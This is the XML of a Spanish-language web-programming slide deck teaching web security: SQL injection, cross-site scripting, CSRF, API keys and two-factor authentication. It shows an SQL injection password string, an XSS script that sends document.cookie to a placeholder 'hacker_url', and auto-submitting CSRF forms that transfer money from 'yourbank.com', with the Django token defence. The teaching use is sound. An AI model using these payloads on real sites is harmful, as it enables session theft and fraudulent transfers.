            <a:ext cx="79746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7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SELECT * FROM users</a:t>
            </a:r>
            <a:endParaRPr sz="27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7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	WHERE (username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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'alice'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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7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7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	AND (password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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'12345'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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27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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="1216650"/>
            <a:ext cx="82356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700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Username:</a:t>
            </a:r>
            <a:endParaRPr sz="27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700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> hacker</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                                       </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2700">
              <a:solidFill>
                <a:srgbClr val="FFFFF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7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700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Password:</a:t>
            </a:r>
            <a:endParaRPr sz="27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700">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t> 1' OR '1' = '1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>                                             </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="2700">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="FFFFFF"/>
                </a:highlight>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:endParaRPr sz="2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Git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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584700" y="1737000"/>
            <a:ext cx="79746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7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SELECT * FROM users</a:t>
            </a:r>
            <a:endParaRPr sz="27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7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	WHERE (username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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username</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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7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7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	AND (password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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27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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="584700" y="1737000"/>
            <a:ext cx="79746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7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SELECT * FROM users</a:t>
            </a:r>
            <a:endParaRPr sz="27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7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	WHERE (username = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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'hacker'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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7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7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	AND (password = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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'1' OR '1' = '1'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es" sz="27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27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2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APIs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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Claves de API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="412" name="Google Shape;412;p43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[API Keys]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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="318300"/>
            <a:ext cx="8235600" cy="45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800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Claves de API</a:t>
            </a:r>
            <a:endParaRPr sz="28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F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Limitación de Tarifa</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Autenticación de Ruta</a:t>
            </a:r>
            <a:endParaRPr sz="24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5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JavaScript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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Cross-Site Scripting</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="428" name="Google Shape;428;p46"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Ejecución de Código entre Sitios]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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="798150" y="196650"/>
            <a:ext cx="7547700" cy="47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from flask import Flask, request</a:t>
            </a:r>
            <a:endParaRPr sz="2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app = Flask(__name__)</a:t>
            </a:r>
            <a:endParaRPr sz="2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@app.route("/")</a:t>
            </a:r>
            <a:endParaRPr sz="2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def index():</a:t>
            </a:r>
            <a:endParaRPr sz="2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"Hello, world!"</a:t>
            </a:r>
            <a:endParaRPr sz="2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@app.errorhandler(404)</a:t>
            </a:r>
            <a:endParaRPr sz="2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def page_not_found(e):</a:t>
            </a:r>
            <a:endParaRPr sz="2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"Not Found: " + request.path</a:t>
            </a:r>
            <a:endParaRPr sz="2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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="1452450"/>
            <a:ext cx="8041200" cy="22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@app.errorhandler(404)</a:t>
            </a:r>
            <a:endParaRPr sz="2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def page_not_found(e):</a:t>
            </a:r>
            <a:endParaRPr sz="2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"Not Found: " + request.path</a:t>
            </a:r>
            <a:endParaRPr sz="20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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="174175"/>
            <a:ext cx="8041200" cy="22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/foo</a:t>
            </a:r>
            <a:endParaRPr sz="2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4" name="Google Shape;444;p49"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="2730700"/>
            <a:ext cx="8041200" cy="22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@app.errorhandler(404)</a:t>
            </a:r>
            <a:endParaRPr sz="2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def page_not_found(e):</a:t>
            </a:r>
            <a:endParaRPr sz="2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"Not Found: " + request.path</a:t>
            </a:r>
            <a:endParaRPr sz="20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>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Software de Código Abierto</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="75" name="Google Shape;75;p5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Open-Source Software]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0"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="174175"/>
            <a:ext cx="8041200" cy="22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/&lt;script&gt;alert('hi')&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2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0" name="Google Shape;450;p50"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="2730700"/>
            <a:ext cx="8041200" cy="22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@app.errorhandler(404)</a:t>
            </a:r>
            <a:endParaRPr sz="2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def page_not_found(e):</a:t>
            </a:r>
            <a:endParaRPr sz="2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"Not Found: " + request.path</a:t>
            </a:r>
            <a:endParaRPr sz="20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1"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="174175"/>
            <a:ext cx="8041200" cy="22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/&lt;script&gt;document.write(</a:t>
            </a:r>
            <a:endParaRPr sz="2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'&lt;img src="hacker_url?cookie="</a:t>
            </a:r>
            <a:endParaRPr sz="2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+document.cookie+"&gt;")&lt;/script&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="2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6" name="Google Shape;456;p51"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="551400" y="2730700"/>
            <a:ext cx="8041200" cy="22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@app.errorhandler(404)</a:t>
            </a:r>
            <a:endParaRPr sz="2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def page_not_found(e):</a:t>
            </a:r>
            <a:endParaRPr sz="2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"Not Found: " + request.path</a:t>
            </a:r>
            <a:endParaRPr sz="20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2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Django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3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Cross-Site Request Forgery</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="467" name="Google Shape;467;p53"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Falsificación de Solicitudes entre Sitios]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/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr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  &lt;a href="http://yourbank.com/transfer?to=brian&amp;amt=2800"&gt;</a:t>
            </a:r>
            <a:endParaRPr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      Click Here!</a:t>
            </a:r>
            <a:endParaRPr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  &lt;/a&gt;</a:t>
            </a:r>
            <a:endParaRPr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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr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  &lt;img src="http://yourbank.com/transfer?to=brian&amp;amt=2800"&gt;</a:t>
            </a:r>
            <a:endParaRPr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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr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6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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7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&lt;body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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  &lt;form action="https://yourbank.com/transfer" method="post"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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      &lt;input type="hidden" name="to" value="brian"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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      &lt;input type="hidden" name="amt" value="2800"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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      &lt;input type="submit" value="Click Here!"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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  &lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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7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&lt;body onload="document.forms[0].submit()"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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  &lt;form action="https://yourbank.com/transfer" method="post"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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      &lt;input type="hidden" name="to" value="brian"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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      &lt;input type="hidden" name="amt" value="2800"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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      &lt;input type="submit" value="Click Here!"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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  &lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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7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&lt;/body&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="17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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="222300" y="796800"/>
            <a:ext cx="8699400" cy="3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&lt;form action="/transfer" method="post"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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  {% csrf_token %}</a:t>
            </a:r>
            <a:endParaRPr sz="20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  &lt;input name="to" value="brian"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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  &lt;input name="amt" value="2800"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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  &lt;input type="submit" value="Transfer"&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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0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&lt;/form&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="20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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Pruebas, CI/CD</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="498" name="Google Shape;498;p59"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Testing, CI/CD]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/>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311708" y="10587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Autenticación Doble</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="Google Shape;81;p6"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="311700" y="3292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[Two-Factor Authentication]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0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Escalabilidad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1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Ataques DoS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2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Ataques DDoS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¿Qué sigue?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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="146850"/>
            <a:ext cx="8235600" cy="48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800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Otros Frameworks Web</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Del Lado del Servidor</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Express.js</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Ruby on Rails</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Del Lado del Cliente</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>AngularJS</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>React</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Vue.js</a:t>
            </a:r>
            <a:endParaRPr sz="2000">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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Char char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es" sz="2000">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="20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5"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="454200" y="318300"/>
            <a:ext cx="8235600" cy="45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800">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Otros Sitios Web para Despliegue</a:t>
            </a:r>
            <a:endParaRPr sz="2800">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Amazon Web Services</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>GitHub Pages</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Google Cloud</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Heroku</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Microsoft Azure</a:t>
            </a:r>
            <a:endParaRPr sz="2400">
              <a:solidFill>
                <a:srgbClr val="F3F3F3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s" sz="2400">
                <a:solidFill>
                  <a:srgbClr val="F3F3F3"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...</a:t>
            </a:r>
            <a:endParaRPr sz="24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6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Programación Web con Python y JavaScript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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535400" y="2626050"/>
            <a:ext cx="501000" cy="501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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535400" y="2626050"/>
            <a:ext cx="501000" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd fmla="val 10352" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00A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342325" y="3200375"/>
            <a:ext cx="15642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primer</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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commit</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535400" y="2626050"/>
            <a:ext cx="501000" cy="501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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535400" y="2626050"/>
            <a:ext cx="501000" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd fmla="val 10352" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00A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8"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="94" idx="6"/>
            <a:endCxn id="96" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036400" y="2876550"/>
            <a:ext cx="1763100" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="00A2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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799625" y="2626050"/>
            <a:ext cx="501000" cy="501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8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799625" y="2626050"/>
            <a:ext cx="501000" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd fmla="val 10352" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00A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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342325" y="3200375"/>
            <a:ext cx="15642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primer</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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commit</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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8"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606550" y="3200375"/>
            <a:ext cx="1678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credenciales</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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expuestas</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535400" y="2626050"/>
            <a:ext cx="501000" cy="501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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="535400" y="2626050"/>
            <a:ext cx="501000" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd fmla="val 10352" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00A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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5063850" y="2626050"/>
            <a:ext cx="501000" cy="501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5063850" y="2626050"/>
            <a:ext cx="501000" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd fmla="val 10352" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00A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9"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="105" idx="6"/>
            <a:endCxn id="107" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036400" y="2876550"/>
            <a:ext cx="4027500" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln cap="flat" cmpd="sng" w="76200">
            <a:solidFill>
              <a:srgbClr val="00A2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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799625" y="2626050"/>
            <a:ext cx="501000" cy="501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9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2799625" y="2626050"/>
            <a:ext cx="501000" cy="501000"/>
          </a:xfrm>
          <a:prstGeom prst="donut">
            <a:avLst>
              <a:gd fmla="val 10352" name="adj"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00A2FF"/>
          </a:solidFill>
          <a:ln cap="flat" cmpd="sng" w="9525">
            <a:solidFill>
              <a:srgbClr val="00A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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="342325" y="3200375"/>
            <a:ext cx="15642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primer</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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commit</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2606550" y="3200375"/>
            <a:ext cx="1678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credenciales</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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expuestas</a:t>
            </a:r>
            <a:endParaRPr b="0" i="0" sz="2000" u="none" cap="none" strike="noStrike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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4863125" y="3200375"/>
            <a:ext cx="1678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credenciales</a:t>
            </a:r>
